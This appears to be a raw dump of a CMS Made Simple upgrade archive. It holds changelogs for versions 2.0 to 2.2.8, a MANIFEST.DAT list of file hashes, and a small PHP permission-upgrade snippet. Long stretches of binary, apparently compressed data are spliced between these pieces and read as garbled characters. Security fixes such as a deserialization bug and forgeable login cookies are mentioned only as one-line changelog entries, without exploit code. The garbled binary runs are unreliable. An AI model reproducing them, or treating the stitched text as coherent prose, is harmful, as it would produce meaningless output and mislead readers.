- Adds ability to clear content locks (Admins can clear all locks, regular users can only clear their locks)
- Enhancements to the action to bulk set designs to show only page templates by default, but to optionally show more

DesignManager v1.1.1
- Minor template changes in edit content wrt. locking
- Adds ability to clear template and CSS locks (Admins can clear all locks, regular users can only clear their locks)


Version 2.1 - Bahamas
----------------------------------
Core - General
- Minor performance tweaks to sample htaccess.txt
- Minor fix to the ProcessTemplateFromDatabase module API method.
- Improvements and re-factor the way headers are sent wrt caching
- Add a new method to the ModuleOperations class to allow a module to be within a namespace.
- Enhances the Group class.
- Enhancements and fixes to the cms_url class.
- Modified the $mod->smarty reference to be smarter... it is now deprecated.
- Fixes issue with https requests (#10697)
- Modifies The CmsLayoutTemplate class and CmsLayoutTemplateQuery to allow filtering on listable or non listable
  or setting a template as listable (default) or non listable
- Fixes a problem with styling of the login form if tasks must be run AND a module needs upgrading.
- Fixes to the cloning of templates in CmsLayoutTemplate
- Fixes problem with SetAllHierarchyPositions that cleared the entire cache instead of only the necessary part of it.
- Adds the unloadCancel handler to the lockManager jQuery plugin.
- Moves version.php and include.php inside the lib directory so that they are easier to protect from unwanted direct access.
- Fixes to page alias tests when manually entering a page alias.
- Missing language strings are no longer output to Admin log, but to the debug log.
- Requests for modules that are not installed/enabled, or for invalid actions will now result in 404 errors.
- Fixed problem where restricted content editors could implicitly change the page alias.
- Improvements to the system information page, particularly the bbcode output.
- cms_init_editor, form_start, and cms_action_url plugins are no longer cachable.
- Adds the 'adminonly' option to the {content}, {content_image}, and {content_module} tags to allow only members of the 'Admin' group to manipulate the values of that block.
- Add a trivial check to the sitedown message to make sure that it is not empty.
- Minor fixes for PHP 7

MicroTiny v2.0.2
- Now add page hierarchy to autocomplete text when using the linker.
- Now use $smarty->CreateTemplate for clarity when compling the config template
- Now explicitly assign urls so that they do not get caced by smarty.
- Slightly tweak the default HTML content in the example tab.
- Updated tinymce to the latest 4.2.7 version, included the 'paste' plugin, and turned on 'paste_as_text'.
- Added the ability to enable the table plugin, now distribute the table plugin

CMSContentManager v1.0.2
- Fix problem with pagedefault metadata.
- Fixes for handling no listable templates for a design
- More work with locking.  With only one exception all locking and unlocking is initiated via javascript.
- Minor fix to copycontent

DesignManager v1.1
- Adds ability to toggle the listability of a template.
- Fixes problems with lost changes if there is a syntax error in the template.
- More work with locking.  With only one exception all locking and unlocking is initiated via JavaScript.

News v2.50.3
- Fixes minor issue with pagination in News Admin console.
- Fix errors in the default form template.
- Fixed URL to long issues on redirection after adding/editing article.

Search v1.50.2
- Minor PHP7 fixes.

ModuleManager 2.0.1
- Minor fix to which modules could be uninstalled and deactivated.


Version 2.0.1.1 - Adelaide
----------------------------------
Fix to the $this->smarty magic method in the module class to resolve to the action template or the global Smarty.


Version 2.0.1 - Adelaide
----------------------------------
Core - General
- Improved optimization in ContentOperations::SetAllHierarchyPositions.
- Fixed return type of ContentOperations::GetPageIdFromAlias().
- Help for the {cms_html_options} plugin.
- Change the default page template to use {Navigator}.
- Explicitly force $smarty->fetch() to create a new template, and therefore a new scope. Keep track of scopes in a stack.
- Change prototype to CMSModule::DoActionBase to pass in the current template object.
- SITENAME is now assigned as a Smarty global.
  (fixes some variable scope issues)
- Fix problem with changing content types.
- Fix problem with CmsLayoutTemplateQuery wrt the editable option, that generated an SQL error.
  (resolves problems where people have additional editor access to templates, but no other design manager permissions).
- Fix minor JavaScript errors in plugin (error checking).
- Fix problems where If assign was passed to a {content} tag, do not pass it to the module on a mact request.
- Implements the completely forgotten 403 exception stuff and the IsPermitted content method.
- Improve the cmsms_dirtyform jQuery plugin to support the unload handler and an onUnload callback.
- Fixed the jQuery page selector plugin when the current value points to an invalid page,  and fixes for asynchronous Ajax.
- Adds a globally available cms_busy() JavaScript function for the Admin.
- Fix problem with html entitites in email addresses in user settings.
- Fix problem with {content cssname=string} and quotes.
- Changed cmsms plugins to use $smarty->getTemplateVars() instead of $smarty->get_template_vars() because of scope issues.
- Minor fix to {form_start} when not used in a module.
- Improved error handling for cms_stylesheet.  Now will generate a message in the Admin log, and an html comment on error.

CMSContentManager v1.0.1
- Fixes for changing content types.
- Adds a title for some contextual help if a template is not available for a content item.
- Clear any locks if an exception occurred while submitting a content item.
- Improvements to error handling with apply and preview.
- Content list now refreshes every 30 seconds to display up-to-date lock information.

DesignManager v1.0.1
- Clear the type_default flag when copying a template.
- Clear any locks if an exception occurred while submitting a template.
- Clear any locks if an exception occurred while submitting a stylesheet.
- Template and stylesheet lists now refresh every 30 seconds to display up-to-date lock information.
- Fixes for design exporting templates with protocol-less URLs in them.

MenuManager v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

Navigator v1.0.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Minor change to the help ($node->children_exist)

Search v1.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).

News v2.50.1
- Changes to createSmartyTemplate calls (now use $smarty->get_template_parent()).
- Fix problem with custom fields not being assigned in fesubmit.
- Fix minor problem with html entities in the detail template parameter.

FileManager v1.5.1
- Fix minor problem with Smarty scope in the drop zone.


Version 2.0 - Australia
----------------------------------
+++ Initial Release +++
MANIFEST.DAT000066600000024271150466267770006342 0ustar00MANIFEST GENERATED: 1755000319
MANIFEST FROM VERSION: 2.2.21
MANIFEST FROM NAME: Sherbrooke
MANIFEST TO VERSION: 2.2.22
MANIFEST TO NAME: Saskatoon
ADDED :: cf9e4f710a6e42ef0e7bf8108e3724c2 :: lib\functions\fs.functions.php
ADDED :: e49f4652534af377a713df3d9dec60cb :: LICENCE
DELETED :: 46aaf69a91703493b666f212a04f2d8d :: doc\COPYING.txt
DELETED :: 5114b40fa2cbb20d1934a9f9f20e295b :: modules\MenuManager\action.breadcrumbs.php
DELETED :: d5e6d1f58a8d1d15f1652c08d534c979 :: modules\MenuManager\action.default.php
DELETED :: 6e8a2a74e8d5b457449d1bd8655fe366 :: modules\MenuManager\action.items.php
DELETED :: 01f32cabd4ae5b4ab5599aeb6806815a :: modules\MenuManager\changelog.inc
DELETED :: 42de5bb878e05e13f7cd671cf098f583 :: modules\MenuManager\CSSMenu.js
DELETED :: f431f4e7bbc5d9e9022f69f25b828b65 :: modules\MenuManager\images\arrow.gif
DELETED :: 446974e0a6e4d953817692bd407e1313 :: modules\MenuManager\images\icon.gif
DELETED :: fc56ddb2bdda1f420478fee93a32569e :: modules\MenuManager\lang\en_US.php
DELETED :: 2772cdd710883f684b9587d5b73a6db9 :: modules\MenuManager\lang\ext\ar_AR.php
DELETED :: 172fef8add1afd77f072f29ee6b38cb3 :: modules\MenuManager\lang\ext\ca_ES.php
DELETED :: 03e62514c224e925971a29cb34aa10e3 :: modules\MenuManager\lang\ext\cs_CZ.php
DELETED :: 8de8fa7be9b13ece8f14bfd3b17fd5bf :: modules\MenuManager\lang\ext\da_DK.php
DELETED :: 5f6cf02ece2670cc6328bd9c2fb9908f :: modules\MenuManager\lang\ext\de_DE.php
DELETED :: 4b80d4026c14bb63ba23ba25c89f3cdd :: modules\MenuManager\lang\ext\el_GR.php
DELETED :: bc674f6be6fea029d79ab9f823986b4f :: modules\MenuManager\lang\ext\en_CY.php
DELETED :: 2c62d777aabae003ea08ff41cd94d8f8 :: modules\MenuManager\lang\ext\es_ES.php
DELETED :: d9924a765f95940a6ab72b1cdab119b6 :: modules\MenuManager\lang\ext\et_EE.php
DELETED :: 3c0a68d0ac7a147060162c49eb173e0a :: modules\MenuManager\lang\ext\fa_FA.php
DELETED :: 3c0a68d0ac7a147060162c49eb173e0a :: modules\MenuManager\lang\ext\fa_IR.php
DELETED :: fe8f269e36c6472f471e8cb74c3e9ea0 :: modules\MenuManager\lang\ext\fi_FI.php
DELETED :: 0d6ece2ec25c8e261e82e82b77e8c3ed :: modules\MenuManager\lang\ext\fr_FR.php
DELETED :: b91537478e0896ce9c4e85b6a3b1c7ff :: modules\MenuManager\lang\ext\hr_HR.php
DELETED :: afa2c227f270ddb63300e107d3514595 :: modules\MenuManager\lang\ext\hu_HU.php
DELETED :: 7bd02be3f935ea2e8ab7ea452f1378aa :: modules\MenuManager\lang\ext\it_IT.php
DELETED :: 8d890c30b12d3182da1c1cbf5dcf6bca :: modules\MenuManager\lang\ext\iw_IL.php
DELETED :: 60f9a7fce02a85dfed5bfe76e9e5f9c7 :: modules\MenuManager\lang\ext\ja_JP.php
DELETED :: e5e6df0b0952f6158b4d57fe9a45d538 :: modules\MenuManager\lang\ext\lt_LT.php
DELETED :: 358a8d492cbb4c4814bc23d857f510d3 :: modules\MenuManager\lang\ext\nb_NO.php
DELETED :: d7de11a0891d43afebf365a48412468b :: modules\MenuManager\lang\ext\nl_NL.php
DELETED :: eb49c9d392a597a66a18a083237936bf :: modules\MenuManager\lang\ext\pl_PL.php
DELETED :: aabdb7999656e0a473c80e7cf157a531 :: modules\MenuManager\lang\ext\pt_BR.php
DELETED :: 3a9cf1aacab15c620dc9a9961e7f5db3 :: modules\MenuManager\lang\ext\pt_PT.php
DELETED :: 0e8b3d229d121622bb2eaefba0af4f45 :: modules\MenuManager\lang\ext\rm_CH.php
DELETED :: 231e3c5aae2b6ce10a98fa9799ff9223 :: modules\MenuManager\lang\ext\ro_RO.php
DELETED :: 756575042c1cd778e940340ea741b419 :: modules\MenuManager\lang\ext\ru_RU.php
DELETED :: 215fbc68f7f813c6ccc1db69149ff42d :: modules\MenuManager\lang\ext\sk_SK.php
DELETED :: 7362765f11aa0b63f1168b0041191351 :: modules\MenuManager\lang\ext\sl_SI.php
DELETED :: 280f5b228806e0577329751fe26607f5 :: modules\MenuManager\lang\ext\sr_YU.php
DELETED :: ec3e58c00b7d8f1c57e94892b273d598 :: modules\MenuManager\lang\ext\sv_SE.php
DELETED :: 6e43ef330d3610921fb93a91e99b67f7 :: modules\MenuManager\lang\ext\tr_TR.php
DELETED :: 33bb15ba8a7e48806af58cc77d493906 :: modules\MenuManager\lang\ext\zh_TW.php
DELETED :: beda145249d4ad77e44d6b7baab9d957 :: modules\MenuManager\MenuManager.module.php
DELETED :: b1acf21d685b8197111e13c32dc2e3a1 :: modules\MenuManager\method.install.php
DELETED :: 203b39fb203c1ca3a1d22ccebfc67551 :: modules\MenuManager\method.uninstall.php
DELETED :: bae758be9354062096adc1555a28e914 :: modules\MenuManager\method.upgrade.php
DELETED :: 0f1792603f17adbce23e62fba3d8d599 :: modules\MenuManager\templates\accessible_cssmenu.tpl
DELETED :: 700191753a7ecbdcff876fbe50485e54 :: modules\MenuManager\templates\accessible_simple_navigation.tpl
DELETED :: 7230cf3ed38961925e45c2fbdc14864c :: modules\MenuManager\templates\breadcrumbs.tpl
DELETED :: 58bb51accfe0bf11a68e92b29a90d2ad :: modules\MenuManager\templates\cssmenu.tpl
DELETED :: 26527ab05f6f6e4937a4aa744bfadce0 :: modules\MenuManager\templates\cssmenu_ulshadow.tpl
DELETED :: 9b6a2c19f497f9908d5042776cce2528 :: modules\MenuManager\templates\dbtpllist.tpl
DELETED :: 6576c0c4adbb79014328f6783639778e :: modules\MenuManager\templates\edittemplate.tpl
DELETED :: 5430fb5de31a58d14f782795442812fe :: modules\MenuManager\templates\filetpllist.tpl
DELETED :: 403ded08fa80e810b05022d426deb0cc :: modules\MenuManager\templates\importtemplate.tpl
DELETED :: 900497f76843e49ed3a03e58a58b5b62 :: modules\MenuManager\templates\minimal_menu.tpl
DELETED :: 4ad796356345d19141716d9aad8efe66 :: modules\MenuManager\templates\Simplex_Navigation.tpl
DELETED :: 912e41993d605d9935000bb170079e1b :: modules\MenuManager\templates\simple_navigation.tpl
CHANGED :: 65d305423b79113d433d3e201225712c :: admin\ajax_content.php
CHANGED :: 7e9c12cca1510875c12602befb553a7a :: admin\editusertag.php
CHANGED :: 6d91ae1bc423bcdae6f43b2827d21f46 :: admin\index.php
CHANGED :: d512bdfc7cceabdd854d10eab09975f6 :: admin\login.php
CHANGED :: 6953e7f33169a9ebadb89d0d4da22d34 :: admin\siteprefs.php
CHANGED :: b8f68e913e59849d0c967afbfd07e83e :: admin\templates\editusertag.tpl
CHANGED :: ca217fca80bd71ea19d4af7cc7f3c0c9 :: admin\themes\OneEleven\templates\login.tpl
CHANGED :: 46cc27936bde0e8c0035f3353611ae70 :: admin\themes\OneEleven\templates\pagetemplate.tpl
CHANGED :: 641254b408db31c2bc3cf2e511c9249e :: doc\CHANGELOG.txt
CHANGED :: db6ceec401663b6c5c3740b2a66409ce :: index.php
CHANGED :: 2b6338ef0060f0124959f92845294e09 :: lib\classes\class.CMSModule.php
CHANGED :: 80619dc81950f4d17ab8ff8e39f72b0f :: lib\classes\class.moduleoperations.inc.php
CHANGED :: df1d331510a2de9158d51fc8bbe53024 :: lib\classes\class.useroperations.inc.php
CHANGED :: 19f1f6e6dd1d3ccaf2f957641fda3442 :: lib\classes\contenttypes\Content.inc.php
CHANGED :: e536af9f589a5bf7ee8b5d700957e884 :: lib\classes\internal\module_support\modform.inc.php
CHANGED :: 0852676e24c9f97263d5c7c8f72c8616 :: lib\functions\misc.functions.php
CHANGED :: 5a3ca70e6096d87628b603499f4d8cbe :: lib\functions\page.functions.php
CHANGED :: 553aa370d1f1a9b2b0ebf6799544c97e :: lib\include.php
CHANGED :: 4c7de836e15a182547a4aead85de71cb :: lib\lang\tags\en_US.php
CHANGED :: 35090fe59c8d834a2efe1c3f72c25e01 :: lib\smarty\Smarty.class.php
CHANGED :: 326f32118637a3b8d9d702fbb0fc1e25 :: lib\smarty\sysplugins\smartycompilerexception.php
CHANGED :: 28be5b1652a998210937b68230780c8b :: lib\smarty\sysplugins\smarty_cacheresource.php
CHANGED :: 6b1b42ef351a92d6909f1b6e803d4e71 :: lib\smarty\sysplugins\smarty_cacheresource_custom.php
CHANGED :: c7d03fe2fdfffd263dc73138cca3ca9d :: lib\smarty\sysplugins\smarty_cacheresource_keyvaluestore.php
CHANGED :: 512e670f9b250d0db31255b50277cb60 :: lib\smarty\sysplugins\smarty_internal_cacheresource_file.php
CHANGED :: 6cc5d57e2ab471f4a5192abbc300f06c :: lib\smarty\sysplugins\smarty_internal_compile_extends.php
CHANGED :: 5fa9067b07fdc90728541054773fd38b :: lib\smarty\sysplugins\smarty_internal_data.php
CHANGED :: 3fb2efd13422754fac5d7b0b79833d37 :: lib\smarty\sysplugins\smarty_internal_method_createdata.php
CHANGED :: a69f1f1e65439db7776f4763457e534b :: lib\smarty\sysplugins\smarty_internal_method_gettemplatevars.php
CHANGED :: d229d9b22913c1f18e1d81569fa3325c :: lib\smarty\sysplugins\smarty_internal_resource_eval.php
CHANGED :: 314979a4c660b868a338ab21ce92318c :: lib\smarty\sysplugins\smarty_internal_resource_extends.php
CHANGED :: a33eb7aebaed73c4bf26985c8fe8a3f3 :: lib\smarty\sysplugins\smarty_internal_resource_file.php
CHANGED :: dab7ccb89895eef1d5ec32b2b95c37f3 :: lib\smarty\sysplugins\smarty_internal_resource_stream.php
CHANGED :: ba1d180f7980d9cb2aa60212e37aeb31 :: lib\smarty\sysplugins\smarty_internal_resource_string.php
CHANGED :: a150da5f260743c52d679fff796b4014 :: lib\smarty\sysplugins\smarty_internal_runtime_codeframe.php
CHANGED :: 9338f7be3dd3fd6e2fe814facf3f5f0f :: lib\smarty\sysplugins\smarty_internal_runtime_inheritance.php
CHANGED :: e83af4b39b5f28a57337bc131992086f :: lib\smarty\sysplugins\smarty_internal_template.php
CHANGED :: c2d988bba508d2f1561f02e19eb97f09 :: lib\smarty\sysplugins\smarty_internal_templatecompilerbase.php
CHANGED :: 56dbb765f9d7f5604f5cad4f95b423b6 :: lib\smarty\sysplugins\smarty_resource.php
CHANGED :: 742a6c4f81e6ba846ecd82f1fdb0521d :: lib\smarty\sysplugins\smarty_resource_custom.php
CHANGED :: c2428ae155e0064a23b6e438c05791bb :: lib\smarty\sysplugins\smarty_template_config.php
CHANGED :: f7b6f90868a012539fce1e23c823e939 :: lib\smarty\sysplugins\smarty_template_source.php
CHANGED :: 0e0b7bdd4d92e2720a0a0862000b3637 :: lib\version.php
CHANGED :: c5c90913db7e239ee5fe16e53e71f0e6 :: modules\CMSContentManager\action.admin_copycontent.php
CHANGED :: dbd6ba4b5018a602486c2fff77013392 :: modules\CMSContentManager\action.admin_editcontent.php
CHANGED :: 04972643f5e438f7cf59217443da4bef :: modules\CMSContentManager\action.defaultadmin.php
CHANGED :: 89ccc13ad92723a5cc1ce89e114f0d2c :: modules\CMSContentManager\CMSContentManager.module.php
CHANGED :: 0aed6ef222ef7631e43b6544208b86b9 :: modules\CMSContentManager\lang\en_US.php
CHANGED :: 5b4afa21fa02913e428aaae85d0eee6b :: modules\CMSContentManager\lib\class.ContentAssistantFactory.php
CHANGED :: 7d7b20c3fe6612c606cd80577b2ecb20 :: modules\CMSContentManager\lib\class.ContentListBuilder.php
CHANGED :: f5dba28a6bbf46073f6ba7c3632f5536 :: modules\FilePicker\action.ajax_cmd.php
CHANGED :: 3348ee3a633ca2f01ab7632bdd52b14f :: modules\FilePicker\FilePicker.module.php
CHANGED :: 5baecc9dc1670cd9adc5591c73e940b3 :: modules\FilePicker\lib\class.UploadHandler.php
CHANGED :: dedc901808b6346b5e04f8d2c8b86862 :: modules\News\lib\class.news_admin_ops.php
CHANGED :: 7ddd5bdf34f3b78e0a96c1c157fedaee :: modules\Search\action.dosearch.php
CHANGED :: cbb81b4b396ce763ee23e1b6e22b0d2e :: modules\Search\Search.module.php
Changelog will go here.
��X�RK}�W�P��7�����0�yUdeeᶵ������4���0�Z��ɬ\N�����˫��gg_O��޿=�^��Q����_Ώ�s���󗋷G�?O^����=z�y�e��v���ӟh��=:�?e�߬��������[8�q���S�5���R\.̎���gNf�z3���yǫ�U7�=�v������d9�������g�I릲������۴�Q�1&��j�i�N�D�b#{g�.�����V���~6}������
B�ڙD�Q�Rn^��ֲ!���=����Z�s��5<�{w������r��Z�9���d�\&8�T6*��<q�-���Ղe�~
�#��r�Ğ�R1��j��@����]�fl�V]��1E��@�Xb�$�6�|d��*��W�FNZB����iФ՞���ޅ�JO���1lV�Dv9G�Zd<����LB\�pß1�Z��!'kk0�h�7UP�M�ܽ�r�n�7���Ĥ��T�L���IC��c�G���L�&��1���	�w8}s5yAmxK�""˩>?d����g%�	O;��S#%4�AtUZ+�K�Y���^ed����y[<��}�l+�T
UY�z��!<��)ͯOd>��r�gD<I�Q��H�p�:�y���rJ=�?Mt�ܣ�ZS �NS2y��ĢkL�_��~��SdP�h]I��cs>�T%��:T1���KΈ��P�9E*6��~A�;�|�����'ܵ	�Ԯ���Q�(_ٳ�Qb� D1�Ss�"HY�3�;N㥊��xpz���N0�Kَ����C^��1���N~��Q��� ���7%D�HgȊ��^B�oxX�����3���Z�����l��P��q]H��/X@G]A�������/���@7�..#�����I>oB6�9���T�K�C�w�oYq�&�2Й�I|rZ�3��f^B�YN4��`�]%V��Z�M�81i	�U����SY�̐*�A�CGj��5�ˀ��͚�`F��C�y��N��ȳ���M�MG#��
_uAit&��Q����
�{#���&�o4�� � ��h0$|.��U$�T-�'�i��AV�&8xm�x>�AL#�3,�_=��=)�&Q'gHRT&�
#�*�������7R�$��+)6_
P�P[����P>�pyH�������PIl�
E�ZLn���y�ߣo"pک&V�CeV(�8���|s�N��u�d%��O���l��B���\T�8��>@%��G�˕ n����b�đa�؀k���\�R�Pi��?/���@��U��s�)R�J��uV:�4��x��FU�u����Uh(�Iͷ��\\����$z;6���0��3���+�W�� �Ғ�Q9A�~;���I��RV������	%f��Π�b@o����c^�,F̼��'����J���������A<��FS�a��NrM���
�h�oֲz��!`�B�`}
�g�1e�L�а�8}x��米G�R�~�
["�F,�	R��!llT�o�-��bj��rE���*Ō;x���t����7��R�Qކ��0w�%pu`S�-�ĻH�F��i|���Y�*�@�70,{�E�����V���j��G��i죭LX�v�M-hX�6��ڞ�5]�����BBb(�dF�����}���I}�7ܰ*BT��*{�� h����j��+�A�Cs@�b7+X���� %d�,�|��/���TQ
J	��Y�*����Җa�D�=��o���������X�(������^7k�]��G���얘7��'[�MI\R���
F\o��mp�z���fy����q�=�\1�1M��BJg��M���C{�O�o2�R�
����]{�?��Q#F��Version 2.2.3.1 - Happy Adventure
----------------------------------
Core - General
  - Fix an issue when parsing multiple content blocks.
�\��j�0E�~E� 橉;�d�������RQQ;�����=�ro��׳jZ��R�i�N	�Q�X�����*����kU&�@��i����������w�ڻ����%-suI��c��(vB"F��FƓ�/'�.4�^W�����e����hn����a������s&�6�:c%ҒzB�#��J�~�nY�i<��5;�0��a	�y�3��A;�p�<V9�޶���A��s��W�V�H}�W�����,d� '�y������X���S�o�pvKm�ꮮ{������7'�/Ͽ��9wv�����ի���_�.N�<�z������L��N������͛��'����ן�ah��,���_������������ʳ�XL
�{��ژ�N%�oNg�Z�O��?�rs���)��t��b�!��dq��6�ꪪ�c.Q��%�l�����淧<�~�>��1��.'r���ڥ���^4��n���v4���&W+���
9 �\d*�:�
8�m�rzߟ2�!�.��m3�k(���d&���n�5��YEC�锝�H��Y?맵iy��wI�h��Q�@��S̕5:TIi�d�^�w�7���ٻɡ�ꓧTL4)ꢓ����NJ	�z~�٢�A�ɺ�L�0}�9�n�h&����W�U-���v����g�jdՀO��P�������|4�/��O[*��v9]
M{ċ�L�>F@��g��ĬK%0`�^���~g<�v'g�Pa
8锬&rT5�T8�C?1y�h;�#r@(�
�u����y"]s��)���|�����t�?��9����8�P�@%�6TU:R4�'�
[�F��x��h"l�ma��:�Y�iBE��*�{�eã��l�u\j�Pj�ނ$Di�V��Z}�G�1#F%�X���,xO5����c��|{L�ǟ��H6<Z���	!��J��9_^�������ebg| 9��=�+��I�b�a1sRR���ɗe��?܃ʢb"e�j
��Q����N1�D���U�Zԟ��J��*gQ6Lr� j@>�X����ρ�
R�V몓e�2yN���������u5ߔ$��;Z�u��o_kp�C�gpEY�Fm�^3�vE�)��gmɖ<�C�
�bW�Ձ���c�dk�<���χ7�ױD��J�U�1��FS
�-H�:��Ǯ���s���}������(.INCR��[��j�y�)�t�^s"1�*��w�8V]0�த��������Ax��Z�tf�W1�q݂%5\ )�6n�2��$nH[�m���T��"JɄ#�F@�sh��|��!�א�x�U��c�`HE����z���q�l��/]����.x�.[bE+�+YI�
�L��o��>���M��#k":!��T %�9IO�.۔يg�U��&��H �� �*�I!x�6j�4��z��R+��}�xY�&V���}5	ym��d��6�Z��f4���]�˞[ơ;�`�Z,_�%��p$�CC��+��ՙ�����/H�`��b���bZ��:��Kyl�ux�y��Շ���� $Y*�Iƅ��*(��<:��g���,q�>�l�%����K�1��x�1{�n51В��H!��
Y^G�*N�f��1�`���%�#Fp�PRH�h�h"��f�J����n���>���dzq�J�C̲��Y��C�u_v`�߅L��'h-�>�C�$o/��Qmd�������r�~�<?php
$sql = 'SELECT permission_id FROM '.CMS_DB_PREFIX.'permissions WHERE permission_name = ?';
$tmp = (int) $db->GetOne($sql,[ 'Manage Groups'] );
if( $tmp < 1 ) {
    status_msg('Create missing "Manage Users" Permission');
    $new_id = (int) $db->GenID(CMS_DB_PREFIX.'permissions_seq');
    $sql = 'INSERT INTO '.CMS_DB_PREFIX.'permissions (permission_id,permission_name,permission_text,permission_source,create_date,modified_date)
            VALUES (?,?,?,?,NOW(),NOW())';
    $db->Execute( $sql, [ $new_id, 'Manage Groups', 'Manage Groups', 'Core'] );
}
Version 2.2.5 - Wawa
----------------------------------
Core - General
  - Fix minor security issue in the way login information was cached in cookies and the session.
  - Simplify rules around alias editing/generation in fillparams.
    If the alias field exists then we can adjust its value or recalculate an alias.
    Use basic properties, and ownership and permissions to determine if that field exists on the edit form.
  - Minor fixes to the CmsJobManager.
�d�In�PD�>'�?�v�Ǝ#�m%�?4�p���ê�]U��ʒ|�Lw{o���6٧�أ�r)	�0�~��ȼ�t�[y�1���F̓,���㾸��+ir��=�?&�*]xq�RY��J@�<�J	X��Q~{�c��j��jM�}��z�'�z=]�	ιTJG%��BXp�4J(��ue[�_��?o���A�wDj����NÁs���	 �����5��Ao�C�'��P�M���̂"R��
�F������?�;v��͏=r��P(!��g�Q,MD"�JMy��`�l��?|�/���{�Version 2.2.6 - Come by Chance
----------------------------------
Core - General
  - Fixes to AdminAlerts::load_by_name()
  - SetMessage() and SetError() in the module API now use session variables
  - Remove support for module_error and module_action request parameters in admin module actions.
  - Add call to check_login() in admin actions that were missing them.


Search v1.51.3
  - Fix notice in PHP 7.1: A non well formed numeric value encountered...
�l�_o�0�~�|�`�����)�4@*�^���ـ �N�_�B�.��?�]�����s��V��칺��HD+�Pw�㇧���^=m׫i%���p5[V����c��ptɞ7�T|y+�[:p�����}1��wI����@��2��9�}_v��l�x;!���PƦ��q{��X�w�&G�"	v��?#/���^���Ge���
^#���I���Q���r���3�u��	�t�*��Z1F�@�7���0ۥS�n�k7k�W��!8���{Ĕ]���?�O:��	^�w’H�+2:	6'.; $��������η���^���B��%(Bb-</fA����L�o�ܼn�@��P�,�|B�q�ٲ7��s##ź{i�I��k%�t$�(�ꃀ$�
Lh��`Fʮnߕ��Q���!���lDt�i�,�ʬ�i�.O)��ѡ�!��\�BdD
B���0��^�C�N����8�� (Dܷ� ���J�$�E�?v
�����01�o�Version 2.2.7 - Skookumchuck
----------------------------------
Core - General
  - Change internal CSRF variable name
  - Fix object insertion bug via deserialize in LoginOperations
  - Fix issue where login cookie contents could be forged by determining the hashing salt
  - Refactor the mechanism for generating and verifying admin account password reset codes.

FileManager v1.6.6
  - No longer allow uploading files with names that end in .

FilePicker v1.0.2
  - No longer allow uploading files with names that end in .

Search v1.51.4
  - Minor fix to microtime calls.
�tS�n�0}�W���w�ƶi�R�U�����6"$	���5�^��)�\Μ33������irW-���Su3��'�3Z]��ݷ���z\�/�	/x�Ϝ�ټ�N>�O��xs��W�[�6�u�W�?g���f2���袴�;�H�DC��פ��ǔ�.����6����k�������+�eLD/�Rʃv�!�ȴc$�?�h=4
�EZ���A��.�f�x'O�������m˦�eh�������=/AGǂ�>HdAD'��V%���R�uC�E���S�F�Ր�u����AH`�o�?��l݌�߻�n���C�KVj2y�^Hi�����X����#��
y���`�����׀Z�h���=Ѻ
�.^�$)
�	�|�FM�D"��#� 4���-6G��K�.�h��ջ���p�|�&�yC���i�<��?��{�/ �d�W�9�`�`N�� v�s�w��w8ȹ�NɘA ��-*�Q��7u[6{-���e�+�Version 2.2.8 - Flin Flon
----------------------------------
Core - General
  - Re-introduce the host_whitelist config entry that got lost in some commit somewhere.
  - Minor fix to pagination in Admin log.
  - Change Finnish locale priorities so that UTF-8 is first.
  - Minor fix to calling hooks with a single associative array parameter.
  - Adds new HookManager::do_hook_first_result() method
  - cangegroupperms now calls HookManager::do_hook_first_result
  - Minor enhancement to moduleoperations::_load_module() to check if the class exists.
  - Minor enhancement to {cms_action_url} wrt. the page to link to if not specified.
  - Deprecate CMSModule::SetParameterType and CMSModule::CreateParameter methods.
  - Deprecate ModuleOperations::GetModuleParameters() method.
  - CMSModule::RestrictUnknownParameters() now does nothing.
  - No longer warn if a module is sent a parameter that is not registered.
  Note: modules should now be cleaning parameters directly (see filter_var) from $_POST and $_REQUEST ($_GET is automatically cleaned).
  Note: In the future,  $params in module actions will only consist of parameters passed on the module tag.
  - PHP 7.2+ fixes.
  - Fix the inactive param in the page_attr plugin.

FilePicker v1.0.3
  - Minor fix to delete action.

Search v1.51.5
  - Now enforce utf-8 on preg_split.
  - Minor parameter check.
  - Removed deprecated each() function.

CMSJobManager v0.1.3
  - Notices fixed.
  - PHP 7.2+ fixes.

FileManager v1.6.7
  - Remove un-necessary files that may cause a security vulnerability.
  - prevent creating directories with leading or trailing whitespace in the name.

Module Manager v2.1.4
  - PHP 7.2+ fixes.

Navigator v1.0.9
  - Template fix simple_navigation.tpl. Output correct class for parent without active children.

News v2.51.4
  - Notices fixed.
��W�rK|�+��}���s��Ǿ*���m���jF��MI��5��þH#�LVwUVV����ח�o��\^_~���|��L{�c��gW�_�pu���O��}�~qf&f�n^_\]�8���͇�ϧ'��O��ϖ���^]��D�/��D��ꊍ��\���h��}�|���\��׳�\ђne}��?��<o���f5羽s���W]?,�����nX��%ù�R�
�}�2��D�U��Q������χ5-�U�&_���֐!��k�+q�^K�='�·?	��~3F;m�xR�4�ju�a��4)�cv���>���tM\sjJ���T�I�%g��A�g/�^\���O^"U�Mf]$���q6E�%��������[���X�i�=���r*u6�ɰ�F*���I��}QY��K���;�tM�f�4t���d��ߚu��a�/�f$�+����� 1ru"���do��[=�5��1>�l��k
�5]�Ֆƅ�8������6ڤjL(*��AsI���a�ş&�ힾ�)/�1lI&yӪ����8W�N�Z�I�\�X�1&*��'�e��!��a�ٜ��_�R����8\Ks>yn�٩hZ�1�!`�=A}%��vy��Kŭ�~����D��8�7Pլ��CL[N�܊*�U����Q�4�2�~��B�1�����\
;1��V����#�c([���L�6V��s��gW���$�g�5�=.��w��!c�F�d�S��,ș��6ʿ�\�p���fu��:��`�$�ZLv�[ːGM1Y�n�G�_��u�Ѧ�OY��be����J�J�>"�=����X�9Q����6f�b]����H��?��P�'�N���If�����B�ʼn�)ͮ��]�xUa�\!?\�jʐrK:��c��ǩ��)�${��c�B��K!��l>+�<���n?�V����sF��J6��$.E,1BƘm����nf�z�1nTF��H�꒬UEAsK���t�]�F�J슊1�l%�`\�[��2-��ɯ�n�2��X�5�#
�q����v|��7���d��b�hg�[T������p�C�V蛬��n��C��n��l��D��l���U�����L1�gÏi�L��8PZ.�4Wш�
��S�I=������+�iJ�0�~>&g�MRTt�Y�`��"���E?�y�Y�Gmt��c�o"�^а4���F�O��Q�=�o��f5�-y4=G�fsl���J�4�S�)���b\l�ws'��c�(I�'��Rjv���|J�V������g���1��R"1i�
[N�m�c��{
w+Y�U��4m�eSb���@��ip*m�T�>_��`�
